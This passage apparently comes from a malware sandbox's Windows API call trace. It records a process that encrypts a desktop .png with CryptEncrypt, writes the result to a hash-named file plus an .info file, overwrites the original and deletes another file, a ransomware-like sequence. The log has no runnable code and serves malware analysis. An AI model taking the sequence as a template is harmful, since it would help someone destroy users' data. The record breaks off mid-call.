dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.101] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5c978) returned 1 [0071.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.101] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv")) returned 1 [0071.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", lpFilePart=0x0) returned 0x5f [0071.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.102] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5ca18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", lpFilePart=0x0) returned 0x5f [0071.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.102] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5ca18, lpLastWriteTime=0x0) returned 1 [0071.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", lpFilePart=0x0) returned 0x5f [0071.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.102] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5ca18) returned 1 [0071.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.103] CryptImportKey (in: hProv=0x1a5b7b10, pbData=0x22c2618, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5c820 | out: phKey=0x1bf5c820*=0x1a626a60) returned 1 [0071.103] CryptContextAddRef (hProv=0x1a5b7b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.103] CryptExportKey (in: hKey=0x1a626a60, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5c930 | out: pbData=0x0*, pdwDataLen=0x1bf5c930*=0x1c) returned 1 [0071.104] CryptExportKey (in: hKey=0x1a626a60, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22c2708, pdwDataLen=0x1bf5c930 | out: pbData=0x22c2708*, pdwDataLen=0x1bf5c930*=0x1c) returned 1 [0071.104] CryptImportKey (in: hProv=0x1a5b7b10, pbData=0x22c2828, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5c7f0 | out: phKey=0x1bf5c7f0*=0x1a626e50) returned 1 [0071.104] CryptContextAddRef (hProv=0x1a5b7b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.104] CryptContextAddRef (hProv=0x1a5b7b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.104] CryptDuplicateKey (in: hKey=0x1a626e50, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5c7e0 | out: phKey=0x1bf5c7e0*=0x1a626ec0) returned 1 [0071.104] CryptContextAddRef (hProv=0x1a5b7b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.104] CryptSetKeyParam (hKey=0x1a626ec0, dwParam=0x4, pbData=0x22c2970*=0x1, dwFlags=0x0) returned 1 [0071.104] CryptSetKeyParam (hKey=0x1a626ec0, dwParam=0x1, pbData=0x22c2920, dwFlags=0x0) returned 1 [0071.104] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0071.104] CryptReleaseContext (hProv=0x1a5b7b10, dwFlags=0x0) returned 1 [0071.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c730) returned 1 [0071.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.104] GetFileType (hFile=0x384) returned 0x1 [0071.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6a0) returned 1 [0071.104] GetFileType (hFile=0x384) returned 0x1 [0071.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", nBufferLength=0x105, lpBuffer=0x1bf5c250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", lpFilePart=0x0) returned 0x5f [0071.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c730) returned 1 [0071.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x300 [0071.105] GetFileType (hFile=0x300) returned 0x1 [0071.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6a0) returned 1 [0071.105] GetFileType (hFile=0x300) returned 0x1 [0071.105] ReadFile (in: hFile=0x384, lpBuffer=0x22c2d88, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5c828, lpOverlapped=0x0 | out: lpBuffer=0x22c2d88*, lpNumberOfBytesRead=0x1bf5c828*=0xd677, lpOverlapped=0x0) returned 1 [0071.106] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22d6da0*, pdwDataLen=0x1bf5c880*=0xd670, dwBufLen=0xd670 | out: pbData=0x22d6da0*, pdwDataLen=0x1bf5c880*=0xd670) returned 1 [0071.107] WriteFile (in: hFile=0x300, lpBuffer=0x22d6da0*, nNumberOfBytesToWrite=0xd670, lpNumberOfBytesWritten=0x1bf5c818, lpOverlapped=0x0 | out: lpBuffer=0x22d6da0*, lpNumberOfBytesWritten=0x1bf5c818*=0xd670, lpOverlapped=0x0) returned 1 [0071.108] ReadFile (in: hFile=0x384, lpBuffer=0x22c2d88, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5c828, lpOverlapped=0x0 | out: lpBuffer=0x22c2d88*, lpNumberOfBytesRead=0x1bf5c828*=0x0, lpOverlapped=0x0) returned 1 [0071.108] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22e4450*, pdwDataLen=0x1bf5c7c0*=0x10, dwBufLen=0x10 | out: pbData=0x22e4450*, pdwDataLen=0x1bf5c7c0*=0x10) returned 1 [0071.108] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22e44a0*, pdwDataLen=0x1bf5c7c0*=0x0, dwBufLen=0x10 | out: pbData=0x22e44a0*, pdwDataLen=0x1bf5c7c0*=0x10) returned 1 [0071.109] WriteFile (in: hFile=0x300, lpBuffer=0x22e44f0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5c748, lpOverlapped=0x0 | out: lpBuffer=0x22e44f0*, lpNumberOfBytesWritten=0x1bf5c748*=0x10, lpOverlapped=0x0) returned 1 [0071.109] CloseHandle (hObject=0x300) returned 1 [0071.110] CloseHandle (hObject=0x384) returned 1 [0071.110] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0071.110] CryptReleaseContext (hProv=0x1a5b7b10, dwFlags=0x0) returned 1 [0071.110] CryptReleaseContext (hProv=0x1a5b7b10, dwFlags=0x0) returned 1 [0071.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", nBufferLength=0x105, lpBuffer=0x1bf5c280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", lpFilePart=0x0) returned 0x5f [0071.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c760) returned 1 [0071.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.110] GetFileType (hFile=0x384) returned 0x1 [0071.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6d0) returned 1 [0071.110] GetFileType (hFile=0x384) returned 0x1 [0071.110] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.111] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.112] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.114] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.114] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x680, lpOverlapped=0x0) returned 1 [0071.115] ReadFile (in: hFile=0x384, lpBuffer=0x22e5c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22e5c10*, lpNumberOfBytesRead=0x1bf5c848*=0x0, lpOverlapped=0x0) returned 1 [0071.116] CloseHandle (hObject=0x384) returned 1 [0071.117] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C.info", nBufferLength=0x105, lpBuffer=0x1bf5c000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C.info", lpFilePart=0x0) returned 0x64 [0071.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c4e0) returned 1 [0071.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.118] GetFileType (hFile=0x384) returned 0x1 [0071.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c450) returned 1 [0071.118] GetFileType (hFile=0x384) returned 0x1 [0071.118] WriteFile (in: hFile=0x384, lpBuffer=0x22f2328*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5c5b8, lpOverlapped=0x0 | out: lpBuffer=0x22f2328*, lpNumberOfBytesWritten=0x1bf5c5b8*=0x77d, lpOverlapped=0x0) returned 1 [0071.119] CloseHandle (hObject=0x384) returned 1 [0071.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c870) returned 1 [0071.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), fInfoLevelId=0x0, lpFileInformation=0x1bf5c950 | out: lpFileInformation=0x1bf5c950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e709e30, ftCreationTime.dwHighDateTime=0x1d4d149, ftLastAccessTime.dwLowDateTime=0x7a62a470, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x7a62a470, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0xd677)) returned 1 [0071.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c830) returned 1 [0071.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.354] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", dwFileAttributes=0x80) returned 1 [0071.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c8b0) returned 1 [0071.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), fInfoLevelId=0x0, lpFileInformation=0x232e5f8 | out: lpFileInformation=0x232e5f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8e709e30, ftCreationTime.dwHighDateTime=0x1d4d149, ftLastAccessTime.dwLowDateTime=0x7a62a470, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x7a62a470, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0xd677)) returned 1 [0071.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c870) returned 1 [0071.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7a0) returned 1 [0071.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.355] GetFileType (hFile=0x384) returned 0x1 [0071.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c710) returned 1 [0071.355] GetFileType (hFile=0x384) returned 0x1 [0071.355] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.356] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.357] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.357] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.358] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.359] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.360] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.360] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.361] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.362] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, 